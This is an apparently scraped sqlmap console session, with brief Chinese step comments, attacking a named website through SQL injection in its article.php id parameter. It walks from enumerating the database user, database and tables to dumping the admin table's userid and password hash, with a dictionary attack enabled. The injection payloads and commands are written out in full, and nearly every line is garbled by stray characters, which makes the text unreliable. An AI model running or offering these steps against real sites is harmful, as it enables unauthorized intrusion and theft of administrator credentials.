D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
# }2 ^! _1 \4 x" Hms "Mysql" --current-user /* 注解:获取当前用户名称
- g, @1 X$ l& K, w sqlmap/0.9 - automatic SQL injection and database takeover tool
5 h% y4 s0 ~( Z( |0 p- b5 i http://sqlmap.sourceforge.net starting at: 16:53:54
, D; g% R0 I2 Q# l' p[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
, |+ p7 a; E) r# x1 C$ k, c9 X session file
$ M/ m1 I" N R[16:53:54] [INFO] resuming injection data from session file
/ M2 h$ z7 W2 w3 Q0 R. j9 _0 ?[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
9 g+ m* i: n: W[16:53:54] [INFO] testing connection to the target url& E) ^/ f1 ~" Q
sqlmap identified the following injection points with a total of 0 HTTP(s) reque/ e3 c6 ?' [, A1 E2 ]
sts:7 W: J) G4 ~) }) Y( y2 H, X
---
/ E |) A% Q: z5 W% q |Place: GET
" d7 |, N, i, L' T" K8 R# GParameter: id
, G3 R5 H! Q" o0 } Type: boolean-based blind
7 e# z+ h5 z* E' a$ r( p1 M Title: AND boolean-based blind - WHERE or HAVING clause3 q7 K' d2 F& m/ {
Payload: id=276 AND 799=799) w9 e% h3 N& k9 u/ t
Type: error-based9 w& u9 f, P9 T! d2 L; N
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
1 T- m4 I7 ~1 T! R Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
- e- E7 J) h/ d5 }8 k5 j7 L/ Z120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
7 t0 p1 d: h* r1 y),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)4 g9 O1 w+ h7 o; |
Type: UNION query
% ~. r6 I! O/ m$ _ Title: MySQL UNION query (NULL) - 1 to 10 columns- F) g" c9 T+ z
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
8 c5 _' v! H. x: m" z5 O* r3 a(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),* y) U% @& y* s, ?0 Q/ P
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#+ S' r/ V/ J+ p: M! U2 ?! t! T
Type: AND/OR time-based blind
1 n% Z" U; _; i w$ M1 K Title: MySQL > 5.0.11 AND time-based blind) d! p8 p- e7 @ L9 |% V' l7 ~' O
Payload: id=276 AND SLEEP(5)0 n- B% \: _; M1 u
---
* u7 L* g! }( D5 V[16:53:55] [INFO] the back-end DBMS is MySQL, R: C# A' Z: E7 n; |
web server operating system: Windows
5 `. [# u; B# j1 F4 ?3 Y, @) Vweb application technology: Apache 2.2.11, PHP 5.3.0
% K5 e' I2 S, pback-end DBMS: MySQL 5.0) U% j/ U! H1 N2 K/ N3 F
[16:53:55] [INFO] fetching current user
/ Q. M6 H! t; ]- ?( Ocurrent user: 'root@localhost' ) u$ n# s B% G9 l
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou8 ]" I- n5 [0 e" n4 Z% f
tput\www.wepost.com.hk' shutting down at: 16:53:58) B9 X. ]* i* f1 M3 B6 C" Y! e
; L {+ n: m. C- C! h( ID:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db$ w1 F% c% h6 ?# k: E q' Y
ms "Mysql" --current-db /*当前数据库
1 _+ i/ f! P8 Z& u$ {4 o0 ` sqlmap/0.9 - automatic SQL injection and database takeover tool
& x8 u# ?4 F6 ]: j c http://sqlmap.sourceforge.net starting at: 16:54:16, i5 |" d* K6 J4 M( q8 ?
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
0 V" w x3 O; t5 X session file
# t( Q! k1 a) S* h3 i: e9 r! C[16:54:16] [INFO] resuming injection data from session file
" E; j, }* E, G. ]( s9 s[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file' C( o2 _1 b1 |3 O9 Q% Y& d4 m
[16:54:16] [INFO] testing connection to the target url) U6 H1 H9 q A
sqlmap identified the following injection points with a total of 0 HTTP(s) reque; q8 v+ h U$ v* U2 n
sts:
^% W( S z2 B1 p( \---6 D: c. \" W6 o/ W$ E
Place: GET
4 o( q) s; g. ^3 VParameter: id
" M2 t& q! L8 Z Type: boolean-based blind; C/ _/ g+ b8 F' D5 ^
Title: AND boolean-based blind - WHERE or HAVING clause1 n) a* i$ M/ y4 @
Payload: id=276 AND 799=799
3 O6 I) H5 f& ]- Q) _; ^8 b0 | Type: error-based
, J' F5 w# N4 y2 k Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause# Y# b. r1 h! B; {! P. P
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118," `5 `- H" S6 {5 u; b: \
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58; y' k! `; Z9 d6 z: ^
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
+ C3 L' W1 t) `2 ?# y3 p4 N Type: UNION query }) b6 i1 j. `: s
Title: MySQL UNION query (NULL) - 1 to 10 columns8 W+ J: ?2 m1 i) ]2 p. ~, s
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
U( @9 I1 [$ k4 H- C(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),9 _: u1 r9 k* e( _6 ?) T7 Z
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
* B3 E5 O/ x+ j; b! Q: T$ W8 p Type: AND/OR time-based blind
4 k6 l* ?+ e- I8 y% M# z( W2 D. P Title: MySQL > 5.0.11 AND time-based blind$ J' o0 @# V7 ~2 H3 [
Payload: id=276 AND SLEEP(5)
7 E6 D2 V# P6 T$ q---
% h4 ]! H k E[16:54:17] [INFO] the back-end DBMS is MySQL' Y0 N( g6 d' L& g
web server operating system: Windows& X' R4 ~( v7 \; l' C5 h; h0 t
web application technology: Apache 2.2.11, PHP 5.3.0% n: S+ W0 n$ [( r1 b4 Q; p# A
back-end DBMS: MySQL 5.0. L- f1 @/ `9 ~5 T3 B
[16:54:17] [INFO] fetching current database) y8 X! k* c3 R3 d: D& y
current database: 'wepost'
( q6 y# u5 A9 K \& S( \. O[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou2 ^4 G9 ?. k& h1 c5 r
tput\www.wepost.com.hk' shutting down at: 16:54:18
# D, ~2 O- k: M; n* w ^D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db; g6 X* e! u& d6 J5 H( t$ y0 c
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
" `) B0 ^! ~9 @, p U; W sqlmap/0.9 - automatic SQL injection and database takeover tool
+ s# m+ x/ y6 ] http://sqlmap.sourceforge.net starting at: 16:55:25
% q$ g, v$ ]. @[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
* B; T$ h( W3 {$ x session file5 K% O9 ^! m3 s7 f1 I- V2 l
[16:55:25] [INFO] resuming injection data from session file- K& W5 h" c% I! @, T
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
! s" C! ]- I% m- o1 G[16:55:25] [INFO] testing connection to the target url
2 G9 H$ g& ~1 T9 x, [/ ^sqlmap identified the following injection points with a total of 0 HTTP(s) reque8 R4 X0 y8 g; @& T3 m
sts:0 T/ u* ], u% E$ D! R2 E
---7 c9 }. u+ Z& d. E
Place: GET
& k" _% x/ O, M! H m* h4 oParameter: id
0 `; t. C3 q( p! o" s4 z& { Type: boolean-based blind7 D8 B- e p8 \8 h0 {* z& |+ x
Title: AND boolean-based blind - WHERE or HAVING clause
4 G/ c3 M, O1 Y2 ` Payload: id=276 AND 799=799& y! a! y" k( G8 ^. L' `$ a
Type: error-based
, {" V) d% {% V+ |8 n Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
0 r W) B4 [/ a5 O) Y Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
" a+ v2 O9 u: S% b0 @120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58$ Y g4 t" \( _$ z8 D: o& l' k5 `: b( ?
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
) ?1 _% _ I- D& t% b Type: UNION query
' m i, Y. P' R& J Title: MySQL UNION query (NULL) - 1 to 10 columns
0 d9 d$ H' _$ x' b3 v5 r Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR) W+ Q' m7 w/ ^+ T Z6 _
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
5 ^3 m2 u9 P2 R$ o- @/ {CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#5 [. B+ V. x" S! W1 p* [4 r, `3 X* ^
Type: AND/OR time-based blind, W$ T: K3 ~( B2 c5 K% `' E) r
Title: MySQL > 5.0.11 AND time-based blind8 O0 u) K b) ]6 _+ G7 F0 i
Payload: id=276 AND SLEEP(5)# W2 B/ S" y9 a- N1 Q
---
( J2 p. y. W& r[16:55:26] [INFO] the back-end DBMS is MySQL
+ \) }( ~3 \5 L; P6 Vweb server operating system: Windows$ T0 f; f) [0 w
web application technology: Apache 2.2.11, PHP 5.3.0
V* e& z2 y! k# r$ k$ |5 bback-end DBMS: MySQL 5.09 e6 m) l; Y$ t
[16:55:26] [INFO] fetching tables for database 'wepost'
9 o* v- ~' I0 Z1 e! J[16:55:27] [INFO] the SQL query used returns 6 entries+ h0 M3 v$ u( Y' V C3 q
Database: wepost
3 I7 B2 @9 |* H- z! X5 S[6 tables]
; \& D0 F' U V8 f1 c; }# b6 A- h' o: ^+-------------+& m( X2 j9 i% ]# C4 f' `+ y
| admin |
9 T# [" T0 r7 I3 Q3 f| article |. x/ m/ |9 q0 ?* F0 M
| contributor |
1 Y4 k/ i: r6 O5 I8 D| idea |. n: S( I! b1 K2 x: V* f
| image |8 J% S1 s8 i+ D2 d3 N; B
| issue |3 F# P$ L- \& ?% Z
+-------------+0 c& |3 i5 ~- V3 ^( m; m
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
/ e$ U+ V# }6 i' L2 G9 ytput\www.wepost.com.hk' shutting down at: 16:55:338 r5 P- W5 G2 p7 S3 R7 O$ {5 B
7 L/ D) b6 r% m" {- }D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
1 Y) B, [$ ?6 o8 O& j& _/ I! Ims "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
! y* Q. X: m0 g+ ?, v sqlmap/0.9 - automatic SQL injection and database takeover tool
7 C; E+ e- D) @* V* X http://sqlmap.sourceforge.net starting at: 16:56:06
# ~( L6 Y8 r- l, S! x0 q* Csqlmap identified the following injection points with a total of 0 HTTP(s) reque
+ K4 t [ F$ a) i3 w d ests:3 A, E6 b! }3 I8 U, z4 @
---
+ H8 v2 X9 \, ~0 j; N$ JPlace: GET
+ k D$ S! ]! A' `2 d. j- k: nParameter: id
/ t: I! J9 i! A+ L2 m U Type: boolean-based blind
9 r* s, K# {) Q" S7 O Title: AND boolean-based blind - WHERE or HAVING clause: x/ u2 t. F" W; m9 F$ @
Payload: id=276 AND 799=7998 n1 j2 R) q9 \% E/ }" h
Type: error-based
+ q# ]/ s. L( b" x" Q. y; ?0 U& W Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
( z* J$ v% h9 h; a Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,6 U p5 r' g+ L) t; y+ B4 j
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
# t/ P$ R6 h% u. k2 ^$ F! [ P9 |),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)( j ]7 ?. L* a% N2 Z
Type: UNION query1 j0 L6 f$ Z8 v" g. e' n% ?7 \
Title: MySQL UNION query (NULL) - 1 to 10 columns
* b" F. t' v* V f! t- ?! { Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR: }: ]+ g' O# L. B& E2 D
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
R$ Y0 \+ S; ]$ t/ Q3 eCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
$ d2 I3 W4 Z# y Type: AND/OR time-based blind
! P% v4 f8 o! E% u, d. R# x Title: MySQL > 5.0.11 AND time-based blind0 T4 N* b, i+ `, C/ |
Payload: id=276 AND SLEEP(5)! M4 r3 G( u5 R9 H* C, _- d- [
---% I5 p. ?2 F* x {$ Z
web server operating system: Windows
$ S! e _4 J) ?/ Xweb application technology: Apache 2.2.11, PHP 5.3.0
" c3 ]" H, ?) e+ O6 Qback-end DBMS: MySQL 5.01 D3 x; z4 j9 s0 [0 D8 o9 i
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se. Y, q! E4 W2 \4 Y- e2 ^
ssion': wepost, wepost4 B* E! x% _! V% W" p( X
Database: wepost
. C- l6 n( M( X6 \, A8 _Table: admin$ ^& j$ K) t5 d# }# N" m
[4 columns]2 N' J) ?& u. [
+----------+-------------+
d1 }5 E Q3 {| Column | Type |
. F2 K, L5 r* ?7 ^- `+----------+-------------+
. k K1 M& g9 [; p8 |, p6 o| id | int(11) |
+ W9 I# i' W! j5 ?% J| password | varchar(32) |
# z, I' g' v. V; w| type | varchar(10) |8 {# D) S& B+ B# q6 u+ N6 f8 @* ~
| userid | varchar(20) |! S/ ^* e+ v6 b& {- e
+----------+-------------+7 |+ r! V3 w2 t7 S$ U
shutting down at: 16:56:19* _. F! N. S; z- k6 q# S7 R
8 p7 n3 v; c; X1 JD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db4 b% h8 j6 {) Y* e2 \# W! ^
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容0 ?) c+ v& n) [. C9 I% A
sqlmap/0.9 - automatic SQL injection and database takeover tool; W2 h8 e: d8 d" B8 c
http://sqlmap.sourceforge.net starting at: 16:57:14
k2 o. @% s9 W1 Hsqlmap identified the following injection points with a total of 0 HTTP(s) reque
2 l% X( W9 y( d" h+ J( E8 _% K& Tsts:
Z" |5 l1 O7 _3 ]0 ~# d---- [* E) x( c! K6 R: n/ m: N
Place: GET4 { X5 R4 E7 w, i, @
Parameter: id
+ q( B3 M6 {5 C& b& N0 l% U8 C Type: boolean-based blind
% D) U. h$ ^5 P! e& B1 Y Title: AND boolean-based blind - WHERE or HAVING clause
) ]+ Y1 _( _( S) I) q/ F! o8 e Payload: id=276 AND 799=799
; H D4 Q( _: @: a# v Type: error-based R" |% X) y* r4 H9 ^5 M
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause; t# g, [- u4 k# [# U5 a0 W
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
6 e) j, v5 B& A/ v6 `/ W120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,586 C) \4 E9 Z0 L) H& X" k/ ]
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
1 |" {2 g7 W) q2 n Type: UNION query6 o8 g) ~% [' @2 I% ]9 Q
Title: MySQL UNION query (NULL) - 1 to 10 columns
1 d# G1 k( Q+ w Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR" C4 u. \+ L+ _
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),2 [7 F) E+ r7 d: d2 i4 e* ~3 w- L. _
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
/ L, n6 L, T: w S% x# V) B. d Type: AND/OR time-based blind
7 Q- {9 w) f% t Title: MySQL > 5.0.11 AND time-based blind6 F7 D3 Y/ e, e! r0 R* Y
Payload: id=276 AND SLEEP(5)- V: q- V5 l5 z, ?) ^& }
---& w- Y4 ~# @' V" a1 H- V; z+ I
web server operating system: Windows( a. o2 I9 r6 |; C0 Z4 Z( w' D; H
web application technology: Apache 2.2.11, PHP 5.3.0
+ ~2 [- k4 `/ U) M" Nback-end DBMS: MySQL 5.0) ]3 L J7 ~" w! a4 \
recognized possible password hash values. do you want to use dictionary attack o" [$ r( b0 V+ u: a8 U2 E
n retrieved table items? [Y/n/q] y
7 W* F) q- a6 f2 M0 T) R8 N( P0 B; U! Ywhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]- t! Q4 D: t8 f& r
do you want to use common password suffixes? (slow!) [y/N] y
. m. \3 v8 z, a2 D8 }Database: wepost% N0 K' G1 }, v, L) Z
Table: admin
1 v# T$ s- c- ?- m5 K[1 entry]% C, _/ {1 \4 ~( M- Q; q3 L
+----------------------------------+------------+
, @2 s9 |' I% ~' u8 X| password | userid |
8 @9 E. N/ u# W: R) P+----------------------------------+------------+
6 U6 b7 A$ g/ f& Q! x| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |. [$ r6 ^8 T4 t$ f2 r; t
+----------------------------------+------------+5 J% V4 R9 c- N& g7 V! [5 B: N
shutting down at: 16:58:14; L. t3 w; Z8 x5 }- k+ @
9 P, Z! X, W9 U! |$ {2 P
D:\Python27\sqlmap> |